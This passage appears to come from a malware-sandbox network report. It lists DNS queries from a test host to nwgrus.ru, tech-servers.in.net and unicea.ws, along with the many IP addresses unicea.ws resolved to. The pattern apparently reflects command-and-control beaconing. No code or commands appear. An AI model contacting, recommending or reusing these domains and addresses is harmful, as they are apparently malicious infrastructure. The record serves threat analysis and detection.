                                            Oct 19, 2024 06:43:52.813299894 CEST53511101.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:57.318674088 CEST6421253192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:57.465337038 CEST53642121.1.1.1192.168.2.4
                                            Oct 19, 2024 06:43:57.471810102 CEST6509653192.168.2.41.1.1.1
                                            Oct 19, 2024 06:43:57.480257034 CEST53650961.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:06.329474926 CEST5072953192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:06.378844023 CEST53507291.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:06.387263060 CEST5258153192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:06.399254084 CEST53525811.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:11.747459888 CEST5243853192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:11.795420885 CEST53524381.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:11.804964066 CEST5247953192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:11.812458992 CEST53524791.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:17.713236094 CEST6140253192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:17.761531115 CEST53614021.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:17.770863056 CEST5609553192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:17.780821085 CEST53560951.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:23.772494078 CEST6332053192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:23.920578003 CEST53633201.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:23.927993059 CEST6300453192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:23.941919088 CEST53630041.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:29.448184013 CEST6439653192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:29.496779919 CEST53643961.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:29.502087116 CEST5516353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:29.511501074 CEST53551631.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:35.522624969 CEST5363753192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:35.670763969 CEST53536371.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:35.679120064 CEST6289153192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:35.692931890 CEST53628911.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:41.658227921 CEST5792353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:41.894262075 CEST53579231.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:41.903820992 CEST6387053192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:41.916258097 CEST53638701.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:47.520014048 CEST6495953192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:47.568840027 CEST53649591.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:47.579088926 CEST5712553192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:47.588046074 CEST53571251.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:53.154050112 CEST5507753192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:53.407582998 CEST53550771.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:53.415479898 CEST5534253192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:53.424381018 CEST53553421.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:58.602396011 CEST5944453192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:58.652081966 CEST53594441.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:58.660918951 CEST6109953192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:58.670176983 CEST53610991.1.1.1192.168.2.4
                                            Oct 19, 2024 06:44:58.675455093 CEST5017653192.168.2.41.1.1.1
                                            Oct 19, 2024 06:44:58.967871904 CEST53501761.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:05.364461899 CEST5884153192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:05.594314098 CEST53588411.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:05.602200031 CEST6341253192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:05.609821081 CEST53634121.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:11.606097937 CEST6302953192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:11.752604008 CEST53630291.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:11.758584976 CEST5132453192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:11.765506029 CEST53513241.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:18.213108063 CEST5989753192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:18.366010904 CEST53598971.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:18.385843992 CEST6303053192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:18.409480095 CEST53630301.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:24.590960979 CEST5850453192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:24.701432943 CEST53585041.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:24.712013006 CEST6335053192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:24.723958015 CEST53633501.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:30.832644939 CEST5414353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:31.514403105 CEST53541431.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:31.520375967 CEST5703353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:31.534745932 CEST53570331.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:37.829662085 CEST5560753192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:37.840265036 CEST53556071.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:37.843049049 CEST6282153192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:37.855453968 CEST53628211.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:43.706187963 CEST4985753192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:43.883142948 CEST4985753192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:43.967185974 CEST53498571.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:43.967202902 CEST53498571.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:43.975368977 CEST6492753192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:43.985213995 CEST53649271.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:49.836412907 CEST6547353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:50.024265051 CEST6547353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:50.036670923 CEST53654731.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:50.083595991 CEST53654731.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:50.840441942 CEST6139353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:50.850619078 CEST53613931.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:57.132236004 CEST5995353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:57.305071115 CEST5995353192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:57.396687984 CEST53599531.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:57.396701097 CEST53599531.1.1.1192.168.2.4
                                            Oct 19, 2024 06:45:57.401525974 CEST4986053192.168.2.41.1.1.1
                                            Oct 19, 2024 06:45:57.421417952 CEST53498601.1.1.1192.168.2.4
                                            Oct 19, 2024 06:46:05.335688114 CEST5959853192.168.2.41.1.1.1
                                            Oct 19, 2024 06:46:05.385740995 CEST53595981.1.1.1192.168.2.4
                                            Oct 19, 2024 06:46:05.390922070 CEST6106953192.168.2.41.1.1.1
                                            Oct 19, 2024 06:46:05.401643991 CEST53610691.1.1.1192.168.2.4
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 19, 2024 06:42:22.519059896 CEST192.168.2.41.1.1.10xa325Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:22.789664030 CEST192.168.2.41.1.1.10xa58fStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:22.800153017 CEST192.168.2.41.1.1.10xec8Standard query (0)unicea.wsA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:23.805304050 CEST192.168.2.41.1.1.10xec8Standard query (0)unicea.wsA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:24.803971052 CEST192.168.2.41.1.1.10xec8Standard query (0)unicea.wsA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:30.912147045 CEST192.168.2.41.1.1.10xb757Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:31.062853098 CEST192.168.2.41.1.1.10x1739Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:36.125165939 CEST192.168.2.41.1.1.10x5d4dStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:36.176858902 CEST192.168.2.41.1.1.10xc493Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:41.562773943 CEST192.168.2.41.1.1.10x55caStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:41.612140894 CEST192.168.2.41.1.1.10xcd0eStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:47.169883966 CEST192.168.2.41.1.1.10x3f60Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:47.236016989 CEST192.168.2.41.1.1.10x8ebcStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:52.408652067 CEST192.168.2.41.1.1.10xfabfStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:52.685308933 CEST192.168.2.41.1.1.10x8d77Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:57.318674088 CEST192.168.2.41.1.1.10x15ccStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:57.471810102 CEST192.168.2.41.1.1.10x299Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:06.329474926 CEST192.168.2.41.1.1.10xbf51Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:06.387263060 CEST192.168.2.41.1.1.10x56afStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:11.747459888 CEST192.168.2.41.1.1.10x4202Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:11.804964066 CEST192.168.2.41.1.1.10x6ebdStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:17.713236094 CEST192.168.2.41.1.1.10xe53Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:17.770863056 CEST192.168.2.41.1.1.10x1a0Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:23.772494078 CEST192.168.2.41.1.1.10xd03fStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:23.927993059 CEST192.168.2.41.1.1.10xa5eStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:29.448184013 CEST192.168.2.41.1.1.10x28f4Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:29.502087116 CEST192.168.2.41.1.1.10x2c92Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:35.522624969 CEST192.168.2.41.1.1.10x5a75Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:35.679120064 CEST192.168.2.41.1.1.10x43feStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:41.658227921 CEST192.168.2.41.1.1.10x4604Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:41.903820992 CEST192.168.2.41.1.1.10x84e3Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:47.520014048 CEST192.168.2.41.1.1.10xab35Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:47.579088926 CEST192.168.2.41.1.1.10x9c3aStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:53.154050112 CEST192.168.2.41.1.1.10x84e9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:53.415479898 CEST192.168.2.41.1.1.10x1446Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.602396011 CEST192.168.2.41.1.1.10x7985Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.660918951 CEST192.168.2.41.1.1.10x277dStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.675455093 CEST192.168.2.41.1.1.10x4733Standard query (0)unicea.wsA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:05.364461899 CEST192.168.2.41.1.1.10xd741Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:05.602200031 CEST192.168.2.41.1.1.10x40e3Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:11.606097937 CEST192.168.2.41.1.1.10x84d7Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:11.758584976 CEST192.168.2.41.1.1.10x457dStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:18.213108063 CEST192.168.2.41.1.1.10x24f9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:18.385843992 CEST192.168.2.41.1.1.10x3e84Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:24.590960979 CEST192.168.2.41.1.1.10xd2c5Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:24.712013006 CEST192.168.2.41.1.1.10x34aeStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:30.832644939 CEST192.168.2.41.1.1.10x9ad2Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:31.520375967 CEST192.168.2.41.1.1.10x1344Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:37.829662085 CEST192.168.2.41.1.1.10xa13Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:37.843049049 CEST192.168.2.41.1.1.10xde4aStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:43.706187963 CEST192.168.2.41.1.1.10xc819Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:43.883142948 CEST192.168.2.41.1.1.10xc819Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:43.975368977 CEST192.168.2.41.1.1.10xc5beStandard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:49.836412907 CEST192.168.2.41.1.1.10xe383Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:50.024265051 CEST192.168.2.41.1.1.10xe383Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:50.840441942 CEST192.168.2.41.1.1.10x2892Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:57.132236004 CEST192.168.2.41.1.1.10xfde9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:57.305071115 CEST192.168.2.41.1.1.10xfde9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:57.401525974 CEST192.168.2.41.1.1.10x5711Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:46:05.335688114 CEST192.168.2.41.1.1.10x78b4Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:46:05.390922070 CEST192.168.2.41.1.1.10xac92Standard query (0)tech-servers.in.netA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 19, 2024 06:42:22.786690950 CEST1.1.1.1192.168.2.40xa325Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:22.798180103 CEST1.1.1.1192.168.2.40xa58fName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws123.213.233.131A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws109.98.58.98A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws190.146.112.188A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws190.147.2.86A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws46.100.50.5A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws186.137.126.27A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws211.171.233.129A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws78.89.199.216A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws196.189.156.245A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007183075 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws218.111.151.79A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws123.213.233.131A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws109.98.58.98A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws190.146.112.188A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws190.147.2.86A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws46.100.50.5A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws186.137.126.27A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws211.171.233.129A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws78.89.199.216A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws196.189.156.245A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007201910 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws218.111.151.79A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws123.213.233.131A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws109.98.58.98A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws190.146.112.188A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws190.147.2.86A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws46.100.50.5A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws186.137.126.27A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws211.171.233.129A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws78.89.199.216A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws196.189.156.245A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:42:25.007211924 CEST1.1.1.1192.168.2.40xec8No error (0)unicea.ws218.111.151.79A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:31.060017109 CEST1.1.1.1192.168.2.40xb757Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:31.071732044 CEST1.1.1.1192.168.2.40x1739Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:36.173964024 CEST1.1.1.1192.168.2.40x5d4dName error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:36.195174932 CEST1.1.1.1192.168.2.40xc493Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:41.609564066 CEST1.1.1.1192.168.2.40x55caName error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:41.620878935 CEST1.1.1.1192.168.2.40xcd0eName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:47.218054056 CEST1.1.1.1192.168.2.40x3f60Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:47.245474100 CEST1.1.1.1192.168.2.40x8ebcName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:52.678066969 CEST1.1.1.1192.168.2.40xfabfName error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:52.813299894 CEST1.1.1.1192.168.2.40x8d77Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:57.465337038 CEST1.1.1.1192.168.2.40x15ccName error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:43:57.480257034 CEST1.1.1.1192.168.2.40x299Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:06.378844023 CEST1.1.1.1192.168.2.40xbf51Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:06.399254084 CEST1.1.1.1192.168.2.40x56afName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:11.795420885 CEST1.1.1.1192.168.2.40x4202Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:11.812458992 CEST1.1.1.1192.168.2.40x6ebdName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:17.761531115 CEST1.1.1.1192.168.2.40xe53Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:17.780821085 CEST1.1.1.1192.168.2.40x1a0Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:23.920578003 CEST1.1.1.1192.168.2.40xd03fName error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:23.941919088 CEST1.1.1.1192.168.2.40xa5eName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:29.496779919 CEST1.1.1.1192.168.2.40x28f4Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:29.511501074 CEST1.1.1.1192.168.2.40x2c92Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:35.670763969 CEST1.1.1.1192.168.2.40x5a75Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:35.692931890 CEST1.1.1.1192.168.2.40x43feName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:41.894262075 CEST1.1.1.1192.168.2.40x4604Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:41.916258097 CEST1.1.1.1192.168.2.40x84e3Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:47.568840027 CEST1.1.1.1192.168.2.40xab35Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:47.588046074 CEST1.1.1.1192.168.2.40x9c3aName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:53.407582998 CEST1.1.1.1192.168.2.40x84e9Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:53.424381018 CEST1.1.1.1192.168.2.40x1446Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.652081966 CEST1.1.1.1192.168.2.40x7985Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.670176983 CEST1.1.1.1192.168.2.40x277dName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws116.58.10.60A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws190.218.17.143A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws190.220.21.28A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws196.189.156.245A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws2.185.214.11A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws187.199.203.72A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws201.110.253.191A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws123.213.233.131A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws46.100.50.5A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:44:58.967871904 CEST1.1.1.1192.168.2.40x4733No error (0)unicea.ws105.197.97.247A (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:05.594314098 CEST1.1.1.1192.168.2.40xd741Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:05.609821081 CEST1.1.1.1192.168.2.40x40e3Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:11.752604008 CEST1.1.1.1192.168.2.40x84d7Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:11.765506029 CEST1.1.1.1192.168.2.40x457dName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:18.366010904 CEST1.1.1.1192.168.2.40x24f9Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:18.409480095 CEST1.1.1.1192.168.2.40x3e84Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:24.701432943 CEST1.1.1.1192.168.2.40xd2c5Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:24.723958015 CEST1.1.1.1192.168.2.40x34aeName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
